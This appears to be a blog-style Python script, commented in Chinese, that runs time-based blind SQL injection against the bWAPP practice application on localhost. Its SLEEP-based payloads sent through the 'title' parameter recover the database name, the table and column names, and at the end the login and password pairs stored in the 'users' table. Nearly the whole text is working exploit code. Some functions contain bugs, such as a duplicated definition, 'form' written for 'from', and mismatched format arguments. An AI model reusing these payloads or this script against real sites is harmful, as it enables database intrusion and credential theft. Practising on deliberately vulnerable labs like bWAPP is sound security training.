sql注入----sql injection script
import requests
import time
import yaml
HEADER={
"cookie":"PHPSESSID=mgmbi0f5munhthiqfrvbmg73v1; security_level=0"
}
BASE_URL='http://localhost/bWAPP/app/sqli_15.php'
config_path = "E:/Django/hhPro/yamls/sqlBlindInjection.yaml"
# 读取test.yaml文件
with open(config_path, "r") as file:
data = yaml.load(file.read())
student1 = data["BLINDSQL"]["SQL1"]
#print(student1)
def get_database_name_length(a,b)->int:
count=0
#title=Iron Man' AND LENGTH(DATABASE())={} AND SLEEP(3) -- &action=search
if a[-1]!="?":
a=a+"?"
for i in range(1,100):
url=a+b.format(i)
start_time = time.time()
print(url)
requests.get(url,headers=HEADER)
if time.time() - start_time > 2:
print("盲注数据库名长度为{}".format(i))
count = i
return count
return count
#获得盲注的数据库长度
def get_database_name()->int:
count=0
#title=Iron Man' AND LENGTH(DATABASE())={} AND SLEEP(3) -- &action=search
for i in range(1,100):
url=BASE_URL+"?title=Iron Man' AND LENGTH(DATABASE())={} AND SLEEP(2) -- &action=search".format(i)
start_time = time.time()
requests.get(url,headers=HEADER)
if time.time() - start_time > 2:
print("盲注数据库名长度为{}".format(i))
count = i
return count
return count
#获得盲注的数据库名称
def get_database_table(count):
#mmp=get_database_name()
x=""
for i in range(1,count+1):
for m in range(33,127):
url=BASE_URL+"?title=Iron Man' AND ord(mid(DATABASE(),{},1))={} and SLEEP(2) -- &action=search".format(i,m)
start_time = time.time()
requests.get(url, headers=HEADER)
if time.time() - start_time > 2:
x=x+chr(m)
print("盲注数据库名长度为{}".chr(m))
break
print("打印数据库名称"+x)
#获得数据库此库下面表数量
def get_table_count()->int:
for i in range(1,100):
url=BASE_URL+"?title=Iron Man' and "+student1+"={}".format(i)+" -- &action=search"
start_time=time.time()
requests.get(url,headers=HEADER)
if time.time()-start_time>2:
count =i
print("打印当前数据库下面表数量{}"+str(count))
break
return count
#获得每个数据库表名的长度
def get_table_counts(counts)->int:
for i in range(counts + 1):
for m in range(1,100):
url=BASE_URL+"?title=Iron Man' and (select length(table_name) from information_schema.tables where table_schema=database() limit {},1)={}" \
" and sleep(2) -- &action=search".format(i,m)
start_time=time.time()
requests.get(url,headers=HEADER)
if time.time()-start_time>2:
print("打印当前表名长度{}".format(m))
get_database_tabless(i, m)
break
return m
#获得所有数据库的表名
def get_database_tabless(index,count):
x=""
for i in range(1,count+1):
for m in range(33,127):
url=BASE_URL+"?title=Iron Man' AND " \
"ascii(substr((select table_name from information_schema.tables " \
"where table_schema=database() limit {},1),{},1))={}" \
" and sleep(2) -- &action=search".format(index,i,m)
#上面的意思是select括号里面,获得表的长度(第一个表),substr('str',1,1)然后来判断第一个表的字符是什么
start_time = time.time()
requests.get(url, headers=HEADER)
if time.time() - start_time > 2:
x=x+chr(m)
break
print("打印数据库名称{}" + x)
x=""
return x
#根据打印结果,想需要users表里面的列总数
def get_table_count()->int:
count=0
#select count(column_name) from information_schema.columns where table_name='users' 统计users表中有多少个字段
for i in range(1,100):
url=BASE_URL+"?title=Iron Man' AND (select count(column_name) from information_schema.columns where table_name='users')={} " \
"AND SLEEP(2) -- &action=search".format(i)
start_time = time.time()
requests.get(url,headers=HEADER)
if time.time() - start_time > 2:
print("盲注数据库中users表列数量为:{}".format(i))
count = i
return count
return count
#获得users表中列名的长度
def get_table_nameNumber(count):
for i in range(count+1):
for j in range(100):
url=BASE_URL+"?title=Iron Man' AND (select length(column_name) from information_schema.columns where table_name='users' limit {},1)={} " \
"AND SLEEP(2) -- &action=search".format(i,j)
start_time = time.time()
requests.get(url, headers=HEADER)
if time.time() - start_time > 2:
get_column_name_of(i,j)
print("user表,字段长度为{}".format(j))
break
#获取每个字段的名称
def get_column_name_of(index,count):
for i in range(count+1):
for j in range(33,127):
url=BASE_URL+"?title=Iron Man' AND " \
"ascii(substr(select column_name form information_schema.columns where table_name='user'),{},1)={} " \
"AND SLEEP(2) -- &action=search".format(index,i,j)
start_time = time.time()
requests.get(url, headers=HEADER)
if time.time() - start_time > 2:
print(chr(j))
break
#获得所需字段的用户名跟密码
def get_username_password():
values=""
for i in range(100):
for j in range(33,127):
url=BASE_URL+"?title=Iron Man' AND ascii(substr((select concat(login,',',password) from users limit 0,1),{},1))={} " \
"AND SLEEP(2) -- &action=search".format(i,j)
start_time = time.time()
requests.get(url, headers=HEADER)
if time.time() - start_time > 2:
values=values+chr(j)
break
print(values)
values=""
备注:盲注的时候一般使用and
if __name__=='__main__':
#get_table_counts(get_table_count())
#get_database_table(get_database_name())
#get_table_counts(get_table_count())
#get_table_count()
#get_table_count()#打印users表中总列数量
get_username_password()#打印需要的日志
userAgent:浏览器访问要求,可以绕过最简单的内容,单引号判断sql注入
沫笙
